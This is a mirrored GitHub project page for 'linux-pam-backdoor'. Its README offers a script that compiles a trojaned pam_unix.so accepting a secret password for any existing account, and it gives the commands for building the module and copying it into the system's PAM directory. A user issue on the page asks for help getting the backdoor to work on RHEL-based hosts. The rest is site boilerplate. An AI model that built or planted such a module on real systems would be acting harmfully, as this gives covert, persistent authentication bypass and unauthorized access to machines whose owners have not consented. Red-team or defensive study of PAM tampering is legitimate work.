Giter Site home page Giter Site logo

linux-pam-backdoor's Introduction

linux-pam-backdoor

Linux PAM Backdoor

This script automates the creation of a backdoor for Linux-PAM (Pluggable Authentication Modules)

Usage

To generate the backdoored pam_unix.so, just run:

./backdoor.sh -v 1.3.0 -p som3_s3cr4t_p455w0rd

You have to identify the PAM version installed on the system, to make sure the script will compile the right version. Otherwise you can break the whole system authentication.

After the execution of the script, the last step is to copy the generated pam_unix.so to the pam modules dir on the host.

cp pam_unix.so /usr/lib/security/

That's all.

After that, you can log-in to the system using an existing user, and the previously configured password.

Use this for educational purposes only. I am not responsible for the damage you might cause.

Dependencies

Tested with Ubuntu 20.04:

  • 1.1.8 and older: failed to compile
  • 1.2.0: worked
  • 1.3.0 to 1.4.0: worked

The following packages were used:

apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc

linux-pam-backdoor's People

Contributors

0ca avatar tomz00 avatar zephrax avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar

Forkers

team-firebugs zw999 fingerleakers ykankaya n16c4m 0ca egebalci valitnon attackgithub c0rpse 0xfatty fengjixuchui 0x5uo2hen ziggsbee tears2015 d4nch3n mohinparamasivam fr3dd1e narayanr7 9bie mygit2014 sfrhaxor gnebbia alfonmga dkorzhevin 0x5a65726f4b65776c droon99-developer c3l3si4n ahhh socmap tcarters eniac888 kitague pafh99 edsonjt81 haraprasadghosh 5l1v3r1 apt-37 fdlucifer reeves0x0 phr0stb1t3 sengkyaut 0xcyberpj emranjk nodauf go-bi zha0 mav8557 laurancelo grumpycatfb ios1024 zabuqasem cmd-nobody jmi-17 jesusgavancho lowsecurity777 pmihsan haclabs olivenjeri aceizwild svchost9913 outs1d3r-net cha00b apkc dj-5803 hotelzululima 3v1lw1th1n 0xbillw xtenex timb-machine-mirrors alaxar nanotrash 30579096 antirais justinthislife

linux-pam-backdoor's Issues

Install on CentOS and Fedora x86_64

Hello man, how are you?

I was testing this kind of approach to backdoor PAM on RHEL based systems x86_64.

So I didn't get success. I searched the right PAM version with this command:

yum list pam | grep @ | cut -d " " -f 25 | cut -d "-" -f 1

and after that, I have downloaded the same version of PAM, patched, compiled and installed on the following directory: /usr/lib64/security.

The /usr/lib/security doesnt exsists on this system, and I have searched for this folder with: find / -name pam_unix.so

Then, after that, I cant connect on the SSH with the right magic password and even with the real password. The authenticate module is broken now. (obviously I have a backup).

So can you help me a mitigate this error?

Thanks for your time.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.